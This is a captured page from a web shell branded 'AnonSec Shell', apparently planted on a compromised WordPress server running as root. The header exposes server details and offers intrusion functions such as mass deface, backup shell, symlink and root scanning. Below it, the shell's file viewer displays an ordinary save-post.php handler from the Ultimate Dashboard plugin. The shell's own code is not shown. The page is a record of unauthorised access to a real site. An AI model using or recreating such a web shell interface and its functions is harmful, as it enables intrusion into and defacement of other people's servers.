AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.15.22.117   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/ultimate-dashboard/modules/admin-page/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/ultimate-dashboard/modules/admin-page/inc/save-post.php
<?php
/**
 * Admin page saving process.
 *
 * @package Ultimate_Dashboard
 */

// are we sanitizing everything correctly? Not sure if all of those are actually text fields.

use Udb\AdminPage\Admin_Page_Module;

defined( 'ABSPATH' ) || die( "Can't access directly" );

/**
 * Save admin page.
 *
 * @param Admin_Page_Module $module The admin page module.
 * @param int               $post_id The post ID.
 */
return function ( $module, $post_id ) {

	if ( wp_is_post_autosave( $post_id ) || wp_is_post_revision( $post_id ) ) {
		return;
	}

	if ( 'udb_admin_page' !== get_post_type( $post_id ) ) {
		return;
	}

	if ( empty( $_POST ) ) {
		return;
	}

	if ( ! isset( $_POST['udb_nonce'] ) || ! wp_verify_nonce( $_POST['udb_nonce'], 'udb_edit_admin_page' ) ) {
		return;
	}

	// Active status.
	if ( isset( $_POST['udb_is_active'] ) ) {
		update_post_meta( $post_id, 'udb_is_active', 1 );
	} else {
		delete_post_meta( $post_id, 'udb_is_active' );
	}

	// Content type.
	if ( isset( $_POST['udb_content_type'] ) ) {
		update_post_meta( $post_id, 'udb_content_type', sanitize_text_field( $_POST['udb_content_type'] ) );
	}

	// HTML content.
	if ( isset( $_POST['udb_html_content'] ) ) {
		update_post_meta( $post_id, 'udb_html_content', wp_kses_post( $_POST['udb_html_content'] ) );
	}

	// Menu type.
	if ( isset( $_POST['udb_menu_type'] ) ) {
		update_post_meta( $post_id, 'udb_menu_type', sanitize_text_field( $_POST['udb_menu_type'] ) );
	}

	// Menu parent.
	if ( isset( $_POST['udb_menu_parent'] ) ) {
		update_post_meta( $post_id, 'udb_menu_parent', sanitize_text_field( $_POST['udb_menu_parent'] ) );
	}

	// Menu order.
	if ( isset( $_POST['udb_menu_order'] ) ) {
		update_post_meta( $post_id, 'udb_menu_order', sanitize_text_field( $_POST['udb_menu_order'] ) );
	}

	// Menu icon.
	if ( isset( $_POST['udb_menu_icon'] ) ) {
		update_post_meta( $post_id, 'udb_menu_icon', sanitize_text_field( $_POST['udb_menu_icon'] ) );
	}

	// Display page title.
	if ( isset( $_POST['udb_remove_page_title'] ) ) {
		update_post_meta( $post_id, 'udb_remove_page_title', 1 );
	} else {
		delete_post_meta( $post_id, 'udb_remove_page_title' );
	}

	// Add page margin.
	if ( isset( $_POST['udb_remove_page_margin'] ) ) {
		update_post_meta( $post_id, 'udb_remove_page_margin', 1 );
	} else {
		delete_post_meta( $post_id, 'udb_remove_page_margin' );
	}

	// Display admin notices.
	if ( isset( $_POST['udb_remove_admin_notices'] ) ) {
		update_post_meta( $post_id, 'udb_remove_admin_notices', 1 );
	} else {
		delete_post_meta( $post_id, 'udb_remove_admin_notices' );
	}

	// Custom css.
	if ( isset( $_POST['udb_custom_css'] ) ) {
		update_post_meta( $post_id, 'udb_custom_css', $module->content()->sanitize_css( $_POST['udb_custom_css'] ) );
	}

	do_action( 'udb_save_admin_page', $post_id );

};

Anon7 - 2022
AnonSec Team